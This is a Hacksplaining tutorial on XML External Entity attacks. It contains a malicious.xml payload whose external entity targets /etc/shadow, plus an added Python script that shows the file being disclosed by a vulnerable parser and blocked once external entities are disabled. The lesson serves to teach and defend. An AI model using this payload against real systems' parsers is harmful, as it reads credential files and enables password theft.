Hacksplaining

XML External Entities

He crafts a malicious XML file whose document type declaration defines an external entity pointing at /etc/shadow, the file that holds the hashed passwords of local accounts on Linux systems. His hope is that when the XML is parsed, the parser will fetch this file and splice its contents into the document in place of the entity reference, revealing them to him. (Note that /etc/shadow is readable only by root, so this particular read succeeds only if the parsing process runs with that privilege; the world-readable /etc/passwd is the usual first probe.)

The hacker executing his attack.
malicious.xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xrds [
<!-- SYSTEM marks an external entity; three slashes so the path is /etc/shadow with an empty host -->
<!ENTITY passwords SYSTEM "file:///etc/shadow">
]>
<xrds>
  <!-- the parser replaces this reference with the fetched file contents -->
  &passwords;
</xrds>
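The following script is an added example and is not part of the Hacksplaining lesson. It reproduces the attack end to end with Python's standard-library xml.sax parser (built on expat): a constructed stand-in "shadow" file is written to a temporary directory, a document shaped like malicious.xml points its SYSTEM entity at that file, and the same document is parsed once with external general entities enabled (the historical default of many parsers) and once with them disabled (Python's own default since 3.7.1). The file name, its contents and the helper names are assumptions made for the demonstration.

```python
"""XXE demo: a parser that honours SYSTEM entities discloses a local file.

Added example, not from the Hacksplaining lesson. Standard library only.
The secret file is constructed in a temp directory as a stand-in for
/etc/shadow, so the script runs offline and without root.
"""
import io
import tempfile
import xml.sax
from pathlib import Path
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collects the character data that the parser delivers for <xrds>."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        # Called for ordinary text and for text spliced in from an expanded entity.
        self.chunks.append(content)

    def text(self):
        return "".join(self.chunks).strip()


def build_malicious_xml(target_uri):
    """Same shape as malicious.xml above, parameterised on the target URI."""
    return (
        '<?xml version="1.0" encoding="utf-8"?>\n'
        "<!DOCTYPE xrds [\n"
        f'<!ENTITY passwords SYSTEM "{target_uri}">\n'
        "]>\n"
        "<xrds>\n"
        "  &passwords;\n"
        "</xrds>\n"
    ).encode("utf-8")


def parse_xrds(xml_bytes, resolve_external_entities):
    """Parse the document and return the text content of <xrds>.

    resolve_external_entities=True: SYSTEM entities are fetched and expanded
    inline (the vulnerable configuration). False: the reference expands to
    nothing, which is the hardened setting.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.text()


def demo():
    """Write a constructed 'shadow' file, attack it, then show the fix."""
    # Constructed sample line; the hash is not real.
    secret = "root:$6$constructed$notarealhash:19000:0:99999:7:::\n"
    with tempfile.TemporaryDirectory() as tmp:
        shadow = Path(tmp) / "shadow"
        shadow.write_text(secret)
        # as_uri() yields file:///..., i.e. an empty host and an absolute path.
        xml_bytes = build_malicious_xml(shadow.as_uri())
        leaked = parse_xrds(xml_bytes, resolve_external_entities=True)
        safe = parse_xrds(xml_bytes, resolve_external_entities=False)
    return leaked, safe


if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable parser returned:", repr(leaked))
    print("hardened parser returned:  ", repr(safe))
```

Run it and the vulnerable parse returns the constructed shadow line while the hardened parse returns an empty string. Two details worth noting: the entity URI must be `file:///path` with three slashes, because `file://etc/shadow` names a host called `etc` and Python's file handler refuses any host other than localhost; and the fetched file is parsed as XML text, so a target containing a bare `&` or `<` breaks the parse and leaks nothing, which is why attackers reach for parameter entities and out-of-band channels on less cooperative files.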
© 2026 Hacksplaining Inc. All rights reserved. Questions? Email us at support@hacksplaining.com